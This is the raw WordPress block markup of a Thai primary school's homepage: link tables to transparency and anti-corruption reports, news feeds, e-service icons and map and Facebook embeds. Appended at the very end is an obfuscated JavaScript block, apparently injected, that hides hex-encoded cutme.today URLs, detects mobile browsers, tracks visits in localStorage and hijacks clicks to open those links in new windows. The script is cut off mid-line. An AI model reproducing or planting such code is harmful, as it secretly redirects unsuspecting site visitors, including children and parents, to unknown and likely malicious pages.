Policy</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=836\">รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\" data-type=\"page\" data-id=\"1032\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1020\" data-type=\"page\" data-id=\"1020\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แผนการปฏิบัติการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1016\" data-type=\"page\" data-id=\"1016\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1036\" data-type=\"page\" data-id=\"1036\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1052\" data-type=\"page\" data-id=\"1052\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_74522c-22\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_df8487-4e\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_df8487-4e\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8c5230-93\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8c5230-93 kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"_c20813-1f\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab_c20813-1f\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"_cc83b8-a1\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab_cc83b8-a1\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 